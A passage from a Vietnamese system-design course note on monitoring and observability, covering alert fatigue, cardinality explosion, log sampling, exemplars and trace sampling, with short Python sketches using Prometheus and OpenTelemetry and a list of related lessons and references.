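def call_payment_service(order_id: str):
    with tracer.start_as_current_span("call_payment_service"):
        headers = {}
        inject(headers)  # ghi traceparent (trace_id + parent span_id) vào dict headers
        # Service phía sau (Flask + FlaskInstrumentor) extract header này,
        # tạo span con cùng trace_id nên Jaeger dựng được waterfall đầy đủ.
        return requests.post(
            "http://payment-service:8082/api/v1/payments",
            json={"order_id": order_id, "amount": 100, "payment_method": "card"},
            headers=headers,
            timeout=2,
        )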
8. Aha Moments & Pitfalls
Aha Moment #1: Alert Fatigue kills Monitoring
Nếu on-call engineer nhận 100 alerts/ngày, sau 2 tuần họ sẽ ignore tất cả — kể cả alert thật sự critical. Đây gọi là alert fatigue (mệt mỏi cảnh báo), và nó đã gây ra nhiều outage nghiêm trọng thực tế (AWS, Google đều từng document).
Giải pháp: Mỗi alert phải actionable (có thể hành động). Nếu alert fires mà engineer không cần làm gì → xoá alert đó. Target: < 5 pages/tuần cho mỗi on-call rotation.
Aha Moment #2: Monitoring the Monitoring
Điều gì xảy ra khi Prometheus chết? Không có alert nào fires cả — vì Prometheus chính là hệ thống gửi alert! Đây là meta-monitoring problem.
Giải pháp:
- Dùng Deadman’s switch: Prometheus gửi heartbeat alert mỗi 1 phút. Nếu PagerDuty không nhận heartbeat trong 5 phút → alert “Prometheus is down”
- Chạy 2 Prometheus instances cross-monitor nhau
- Dùng managed monitoring (Datadog, Grafana Cloud) làm backup cho self-hosted Prometheus
Aha Moment #3: Cardinality Explosion — Silent Killer
Một developer thêm user_id làm label cho metric → 10M users = 10M time series. Prometheus OOM crash lúc 3AM. Không có alert (vì Prometheus đã chết — xem Aha #2).
Prevention:
- Code review cho mọi metric changes
- Alert khi prometheus_tsdb_head_series > threshold
- Enforce label whitelist trong Prometheus relabeling config (và chọn label bounded ngay từ lúc viết code, xem sketch sau danh sách)
- Dùng recording rules để pre-aggregate high-cardinality metrics
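Sketch minh hoạ ở instrumentation level (giả định dùng prometheus_client như section 6.1; tên metric/label chỉ để minh hoạ): label chỉ chứa giá trị bounded, còn user_id đẩy sang structured log hoặc trace, nơi high cardinality không thành vấn đề:
"""
Sketch: tránh cardinality explosion ngay khi định nghĩa metric.
Giả định: dùng prometheus_client như section 6.1; tên metric/label là ví dụ giả định.
"""
from prometheus_client import Counter

# SAI: user_id là unbounded → mỗi user một time series → hàng triệu series
# checkout_total = Counter("checkout_total", "Checkouts", ["user_id"])

# ĐÚNG: label chỉ nhận tập giá trị nhỏ, biết trước (bounded)
CHECKOUT_TOTAL = Counter(
    "checkout_total",
    "Total checkouts",
    ["user_tier", "region"],  # ví dụ: free/pro/enterprise × vài region
)

def record_checkout(user_id: str, user_tier: str, region: str, logger):
    # Metric: chỉ dùng dimension bounded
    CHECKOUT_TOTAL.labels(user_tier=user_tier, region=region).inc()
    # user_id cụ thể đi vào structured log (hoặc span attribute) để drill-down
    logger.info("Checkout completed", extra={"extra_fields": {
        "user_id": user_id, "user_tier": user_tier, "region": region,
    }})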
Aha Moment #4: Log Volume = Money
Với 10K QPS, log 5 lines/request = 4.32B log lines/day ≈ 2.16TB raw/day (giả sử trung bình ~500 bytes/line). Elasticsearch storage cho 90 ngày ≈ 64TB (sau khi nén khoảng 3x). Trên AWS, 64TB EBS gp3 ≈ $5,120/month CHỈ cho storage (chưa kể compute cho ES nodes).
Giải pháp thực tế:
- Log levels: Production default = WARN. Chỉ bật DEBUG cho specific service khi troubleshooting
- Sampling: Log 10% của successful requests, 100% của errors (sketch Python sau danh sách)
- Tiered storage: Hot (SSD, 7 ngày) → Warm (HDD, 30 ngày) → Cold (S3, 1 năm) → Delete
- Loki thay Elasticsearch: Index chỉ labels, không full-text → 10x cheaper storage
- Log aggregation: Thay vì log mỗi request, aggregate thành metrics (rate, error count, latency percentiles)
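Sketch Python cho ý sampling ở trên, dùng logging.Filter chuẩn: giữ 100% WARNING trở lên, chỉ giữ khoảng 10% INFO (tỷ lệ 10% là giả định, em tune theo traffic thật):
"""
Sketch: sampling log ở application level bằng logging.Filter.
Giả định: gắn vào handler JSON đã setup ở section 6.1; sample_rate = 0.1 chỉ là ví dụ.
"""
import logging
import random

class InfoSamplingFilter(logging.Filter):
    """Giữ toàn bộ WARNING trở lên; INFO/DEBUG chỉ giữ theo sample_rate."""
    def __init__(self, sample_rate: float = 0.1):
        super().__init__()
        self.sample_rate = sample_rate

    def filter(self, record: logging.LogRecord) -> bool:
        if record.levelno >= logging.WARNING:
            return True  # errors/warnings: không bao giờ drop
        return random.random() < self.sample_rate  # INFO/DEBUG: giữ ~10%

# Gắn vào handler hiện có (ví dụ handler trong setup_logging của section 6.1):
# handler.addFilter(InfoSamplingFilter(sample_rate=0.1))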
Pitfall #1: Quên correlate giữa 3 pillars
Metrics cho thấy latency tăng. Logs cho thấy “timeout error”. Nhưng không biết liên quan thế nào vì không có trace_id chung giữa metrics → logs → traces.
Fix: Exemplar (Prometheus + Grafana Tempo). Từ metrics chart, click vào data point → jump thẳng tới trace → từ trace, click vào span → jump tới logs. Tất cả qua trace_id.
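Sketch minh hoạ exemplar phía Python (giả định: prometheus_client >= 0.13, expose bằng OpenMetrics format, Prometheus chạy với --enable-feature=exemplar-storage, Grafana bật exemplar trong datasource): gắn trace_id vào data point của histogram để click từ chart nhảy sang trace:
"""
Sketch: gắn exemplar (trace_id) vào histogram để correlate metrics → traces.
Giả định: prometheus_client >= 0.13; ở code thật em chỉ cần sửa chỗ observe()
của REQUEST_DURATION có sẵn trong section 6.1.
"""
from opentelemetry import trace
from prometheus_client import Histogram

REQUEST_DURATION = Histogram(
    "http_request_duration_seconds",
    "HTTP request duration in seconds",
    ["method", "path"],
)

def observe_with_exemplar(method: str, path: str, duration: float):
    span = trace.get_current_span()
    ctx = span.get_span_context()
    exemplar = None
    if ctx.is_valid:
        # Exemplar label đính kèm data point; Grafana hiển thị thành link tới trace
        exemplar = {"trace_id": format(ctx.trace_id, "032x")}
    REQUEST_DURATION.labels(method=method, path=path).observe(duration, exemplar=exemplar)

# Lưu ý: exemplar chỉ được expose khi scrape bằng OpenMetrics format
# (prometheus_client.openmetrics.exposition.generate_latest), không phải text format thường.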
Pitfall #2: Dashboard quá nhiều panels
Dashboard 50 panels = không ai đọc. Giống cockpit máy bay — phi công nhìn 6 đồng hồ chính, không phải 500 đồng hồ.
Fix: Mỗi dashboard tối đa 10-12 panels. Tổ chức theo hierarchy: Overview → Service → Instance. Dùng drill-down links giữa các dashboards.
Pitfall #3: Alert trên symptoms, không trên causes
Sai: Alert khi CPU > 80%. CPU có thể cao vì batch job chạy đúng lịch — hoàn toàn bình thường.
Đúng: Alert khi P99 latency > SLO threshold. Nếu CPU 90% mà latency vẫn < 200ms → không cần page ai cả.
Pitfall #4: Không có runbook
Alert fires lúc 3AM. On-call engineer mới join team 2 tuần. Alert message: “HighErrorRate”. Không có link runbook. Engineer mất 45 phút để tìm hiểu context trước khi bắt đầu fix.
Fix: Mọi alert PHẢI có runbook_url annotation. Runbook chứa: (1) Alert nghĩa là gì, (2) Impact, (3) Steps to investigate, (4) Common fixes, (5) Escalation path.
Pitfall #5: Dựa vào pre-aggregated metrics để debug chi tiết
Metric P99 latency tăng → không biết user nào, request gì, deploy nào gây ra. Pre-aggregated → mất detail.
Fix: Cho debugging path, dùng high-cardinality structured events (OpenTelemetry traces với rich attributes hoặc Honeycomb-style). Tham chiếu section 2.11. Metrics cho dashboard, events cho drill-down.
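Sketch (dùng lại tracer setup ở section 6.1): các dimension high-cardinality đi vào span attributes, nơi backend trace xử lý tốt, thay vì vào metric labels; tên attribute dưới đây chỉ là giả định minh hoạ:
"""
Sketch: high-cardinality context đi vào span attributes (traces), không vào metric labels.
Giả định: tracer đã setup như section 6.1; tên attribute là ví dụ.
"""
from opentelemetry import trace

tracer = trace.get_tracer("payment-service")

def handle_checkout(user_id: str, order_id: str, build_version: str):
    with tracer.start_as_current_span("handle_checkout") as span:
        # High-cardinality: OK cho traces, KHÔNG đưa vào Prometheus labels
        span.set_attribute("user.id", user_id)
        span.set_attribute("order.id", order_id)
        span.set_attribute("deploy.build_version", build_version)
        # ... business logic ...
        # Khi P99 tăng, query backend trace (Jaeger/Tempo/Honeycomb) theo
        # deploy.build_version hoặc user.id để khoanh vùng nhóm request bị chậm.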
Pitfall #6: Chỉ dựa vào SDK instrumentation trong application code
Add OpenTelemetry SDK → 5% performance overhead, language-specific libraries, miss kernel-level issues (TCP retransmits, syscall delay).
Fix: Dùng eBPF observability (Pixie, Cilium Hubble, Parca) cho infrastructure/network. Application SDK chỉ cho business logic. Tham chiếu section 2.12.
Pitfall #7: Sampling 100% traces ở production
Trace data lớn → 1TB/day → cost nhanh chóng vượt revenue.
Fix: Tail-based sampling — keep 100% errors + 100% slow requests + 1% normal. Dùng tail_sampling processor của OpenTelemetry Collector hoặc Datadog Live Search.
9. Internal Links — Liên kết kiến thức
| Topic | Link | Mối liên hệ |
|---|---|---|
| Estimation | Tuan-02-Back-of-the-envelope | Dùng estimation để tính alert threshold, storage sizing cho monitoring stack |
| Networking | Tuan-03-Networking-DNS-CDN | Monitor DNS resolution time, CDN cache hit rate, network latency |
| API Design | Tuan-04-API-Design-REST-gRPC | Instrument API endpoints với RED metrics, structured logging per endpoint |
| Load Balancer | Tuan-05-Load-Balancer | Monitor LB health, connection distribution, backend health checks |
| Cache | Tuan-06-Cache-Strategy | Monitor cache hit rate, eviction rate, memory usage → critical SLI |
| Database | Tuan-07-Database-Sharding-Replication | Monitor replication lag, query latency, connection pool saturation |
| Message Queue | Tuan-08-Message-Queue | Monitor consumer lag, queue depth, dead letter queue size |
| Rate Limiter | Tuan-09-Rate-Limiter | Security alerts cho rate limit violations, DDoS detection |
| Consistent Hashing | Tuan-10-Consistent-Hashing | Monitor hash ring rebalancing, hotspot detection |
| Microservices | Tuan-11-Microservices-Pattern | Distributed tracing across services, service mesh observability |
| CI/CD | Tuan-12-CICD-Pipeline | Deploy frequency tracking, change failure rate (DORA metrics) |
| AuthN/AuthZ | Tuan-14-AuthN-AuthZ-Security | Monitor failed auth attempts, token expiration, permission denials |
| Data Security | Tuan-15-Data-Security-Encryption | Audit log monitoring, PII detection, encryption key rotation alerts |
| URL Shortener | Tuan-16-Design-URL-Shortener | Case study: monitor redirect latency, cache hit rate, storage growth |
| Chat System | Tuan-17-Design-Chat-System | Case study: monitor WebSocket connections, message delivery latency |
| Notification | Tuan-19-Design-Notification-System | Case study: monitor delivery rate, push notification latency, failure rate |
Tham khảo
- Alex Xu, System Design Interview — Chapter on Monitoring & Logging
- Google SRE Book — Chapters: Monitoring Distributed Systems, Service Level Objectives, Practical Alerting
- Betsy Beyer et al., Site Reliability Engineering (O’Reilly)
- Charity Majors et al., Observability Engineering (O’Reilly)
- Brendan Gregg, Systems Performance — USE Method
- Tom Wilkie, RED Method — https://grafana.com/blog/2018/08/02/the-red-method-how-to-instrument-your-services/
- OpenTelemetry Documentation — https://opentelemetry.io/docs/
- Prometheus Documentation — https://prometheus.io/docs/
- sdi.anhvy.dev — Vietnamese System Design Reference
- Tuan-12-CICD-Pipeline — CI/CD pipeline (tuần trước)
- Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization (tuần sau)
Tuần trước: Tuan-12-CICD-Pipeline — CI/CD Pipeline Tuần sau: Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization Security